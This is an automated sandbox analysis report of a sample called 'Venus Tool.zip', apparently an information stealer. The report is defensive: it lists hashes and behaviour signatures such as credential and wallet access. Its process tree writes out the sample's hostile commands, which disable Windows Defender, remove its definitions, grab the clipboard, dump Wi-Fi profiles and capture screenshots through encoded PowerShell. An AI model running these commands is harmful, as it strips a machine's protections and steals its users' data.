Analysis

  • max time kernel
    108s
  • max time network
    275s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    21-06-2024 11:23

General

  • Target

    Venus Tool.zip

  • Size

    9.5MB

  • MD5

    93002d26791ba6a2a3a0c9b6e56a724f

  • SHA1

    698baf5174c5d6f4c09702f9db6cdd709ed1945b

  • SHA256

    52cf7db1923f0518fca3f6f8838312e5241c5faf5bd9a834a54640e0561a79f0

  • SHA512

    eed38e08f34b1a0566d4d924b15b5bf61e33405d66616e5a1d4f2edef07ecf7c7fe7429fc18be107775f4d6a2eb125839855386d3f195db15c6c475c59dedfab

  • SSDEEP

    196608:qQXyE46kTQXurPdEA1lH2li/YASP8lyc59bl3QDUoCbn9rOceHCJoYQO:jq6kTQX0dEAalJ6LpADPQ9ioJF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 48 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Venus Tool.zip"
    1⤵
      PID:560
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4900
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffabc42ab58,0x7ffabc42ab68,0x7ffabc42ab78
        2⤵
          PID:3764
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:2
          2⤵
            PID:3240
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
            2⤵
              PID:2892
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
              2⤵
                PID:2104
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                2⤵
                  PID:1988
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                  2⤵
                    PID:3256
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4304 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                    2⤵
                      PID:1108
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                      2⤵
                        PID:4020
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                        2⤵
                          PID:4704
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                          2⤵
                            PID:4676
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                            2⤵
                              PID:528
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                              2⤵
                                PID:3180
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4876 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                2⤵
                                  PID:5252
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1724 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                  2⤵
                                    PID:5736
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4336 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                    2⤵
                                      PID:6132
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4332 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                      2⤵
                                        PID:5280
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5004 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                        2⤵
                                          PID:1932
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5076 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                          2⤵
                                            PID:5612
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5212 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                            2⤵
                                              PID:5260
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5280 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                              2⤵
                                                PID:5268
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5640 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                                                2⤵
                                                  PID:872
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                                                  2⤵
                                                  • Modifies registry class
                                                  PID:3616
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5856 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                  2⤵
                                                    PID:6024
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6120 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                                                    2⤵
                                                      PID:6076
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6212 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                      2⤵
                                                        PID:3468
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6320 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                        2⤵
                                                          PID:3620
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6456 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                          2⤵
                                                            PID:3728
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6612 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                            2⤵
                                                              PID:620
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6836 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
                                                              2⤵
                                                                PID:6188
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7096 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                                                                2⤵
                                                                  PID:6480
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
                                                                  2⤵
                                                                    PID:6584
                                                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                  1⤵
                                                                    PID:4224
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=ja --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3964,i,12793309452893951174,5058788966923534121,262144 --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:8
                                                                    1⤵
                                                                      PID:4244
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x470 0x3c8
                                                                      1⤵
                                                                        PID:5448
                                                                      • C:\Windows\System32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                        1⤵
                                                                          PID:6704
                                                                        • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                          "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                          1⤵
                                                                            PID:5224
                                                                            • C:\Users\Admin\Downloads\Venus Tool\v.exe
                                                                              "C:\Users\Admin\Downloads\Venus Tool\v.exe"
                                                                              2⤵
                                                                              • Loads dropped DLL
                                                                              PID:6828
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Venus Tool\v.exe'"
                                                                                3⤵
                                                                                  PID:7040
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Venus Tool\v.exe'
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4816
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                  3⤵
                                                                                    PID:7048
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                      4⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4808
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                    3⤵
                                                                                      PID:7152
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        tasklist /FO LIST
                                                                                        4⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:4032
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                      3⤵
                                                                                        PID:4436
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          tasklist /FO LIST
                                                                                          4⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:6084
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                        3⤵
                                                                                          PID:1724
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                            4⤵
                                                                                              PID:6300
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                            3⤵
                                                                                              PID:5772
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Get-Clipboard
                                                                                                4⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:3960
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                              3⤵
                                                                                                PID:5812
                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                  tasklist /FO LIST
                                                                                                  4⤵
                                                                                                  • Enumerates processes with tasklist
                                                                                                  PID:6276
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                3⤵
                                                                                                  PID:5188
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    4⤵
                                                                                                      PID:5960
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                    3⤵
                                                                                                      PID:5368
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        netsh wlan show profile
                                                                                                        4⤵
                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                        PID:1432
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                      3⤵
                                                                                                        PID:1880
                                                                                                        • C:\Windows\system32\systeminfo.exe
                                                                                                          systeminfo
                                                                                                          4⤵
                                                                                                          • Gathers system information
                                                                                                          PID:4540
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                        3⤵
                                                                                                          PID:668
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
